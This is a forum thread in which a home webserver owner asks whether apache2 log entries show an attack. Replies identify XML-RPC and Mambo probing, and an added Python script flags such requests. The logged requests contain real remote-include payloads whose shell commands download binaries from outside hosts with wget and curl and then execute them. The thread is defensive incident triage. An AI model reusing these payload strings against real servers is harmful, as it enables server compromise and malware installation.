
My WebServer Logs - Is this an attack?

Hi, I found some weird entries on my webserver access logs.  My webserver could only have been found by port scanning - it is running on my home PC and I use dynamic dns to locate it.  It is basically just used by friends and family in other states to view pictures of my new baby son.

I found the following in my access log, all from an IP address in Japan, and I think it looks like someone trying to find a vulnerability in my webserver - I have obliterated part of the IP address in the extract below.

NOTE: All of the resources being requested do not exist on my site - I do not have anything like blog/ or blogs/ or any of the stuff being requested.  It looks to me like someone is fishing around for some known vulnerabilities (and not finding any I hope).

I'd appreciate any advice on what you think the logs indicate...  Is this an attack or something innocent?

I'm running apache2.


218.44.74.### - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:14 +1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:16 +1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:17 +1000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:19 +1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:20 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:21 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:23 +1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:24 +1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:25 +1000] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:27 +1000] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

jss1199Commented:
Hi basicinstinct,

You hit the nail on the head....They are fishing to exploit the XML-RPC for PHP vulnerability

http://isc.sans.org/diary.php?storyid=823


Cheers!
 
jhanceCommented:
It's not a problem, however.  Note that all the responses are "404".  That means what was sought was not found.  If this were my server I'd simply put a block on this IP address to prevent further attempts.  You could try reporting this to the ISP that handles this IP but in most cases such requests get ignored.
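As an added example, not part of the original thread: a small Python triage script that parses apache2 combined-format access-log lines, applies the two probe signatures visible in the question (a POST to any xmlrpc.php path, and a mosConfig_absolute_path remote-include query) together with jhance's "all 404" observation, and reports which client IPs are worth blocking. The sample log lines and addresses in it are constructed (RFC 5737 ranges), and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format, the apache2 default.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Probe signatures drawn from the question: POST to any xmlrpc.php path, and a
# Mambo/Joomla-style remote include via mosConfig_absolute_path=http://...
PROBES = {
    "xmlrpc_post": lambda m, p: m == "POST" and p.split("?", 1)[0].endswith("/xmlrpc.php"),
    "mosconfig_rfi": lambda m, p: "mosConfig_absolute_path=http" in p,
}

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def triage(lines, max_404=5, window_s=60):
    """Group requests by client IP; flag an IP if it matches a probe signature or
    sends more than max_404 requests answered 404 inside any window_s-second window."""
    by_ip = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        by_ip[rec["ip"]].append(rec)
    report = {}
    for ip, recs in by_ip.items():
        hits = sorted({n for r in recs for n, f in PROBES.items() if f(r["method"], r["path"])})
        nf = sorted(r["time"] for r in recs if r["status"] == 404)
        burst = max((sum(1 for t in nf if 0 <= (t - t0).total_seconds() <= window_s)
                     for t0 in nf), default=0)
        report[ip] = {"requests": len(recs), "not_found": len(nf), "probes": hits,
                      "block": bool(hits) or burst > max_404}
    return report

# Constructed sample log in the shape of the question's entries (RFC 5737 addresses).
SAMPLE = [
    '203.0.113.7 - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?mosConfig_absolute_path=http://192.0.2.9/cmd.txt? HTTP/1.1" 404 1016 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [06/Apr/2006:14:10:01 +1000] "GET /baby/photo1.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [06/Apr/2006:14:10:05 +1000] "GET /baby/missing.jpg HTTP/1.1" 404 1016 "-" "Mozilla/5.0"',
]
```

Running triage() over a real file (for example the lines of /var/log/apache2/access.log) returns one entry per client IP with its request count, 404 count, matched probes and a block recommendation; the ordinary visitor in the sample, with a single 404, is not flagged.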
 
basicinstinctAuthor Commented:
Thanks for the response - the link to isc.sans.org from jss is very informative.  Thanks also to jhance - I had not noticed the responses were all 404 - that's a relief.  I will indeed block this IP - good idea.

I put the IP address of the attacker into a web browser and it came up with a legitimate website - some open source software developer company thingy.  

Either the attacker originates from there, or I suppose it is more likely that the attacker has already compromised that webserver and is using it to relay attacks.

Either way, I intend to contact this website and ask them to PLEASE EXPLAIN.  I will also write to the ISP.  It is really disappointing - all I want to do is let dear old granny see pictures and videos of her new grandson, and someone out there tries to destroy this without giving it a second thought.  Perhaps they think it makes them some sort of "l33t hacker" or something equally as silly, but they are just scriptkiddies, following the steps that someone else worked out for them.  I'm upset, but I'll stop raving now.
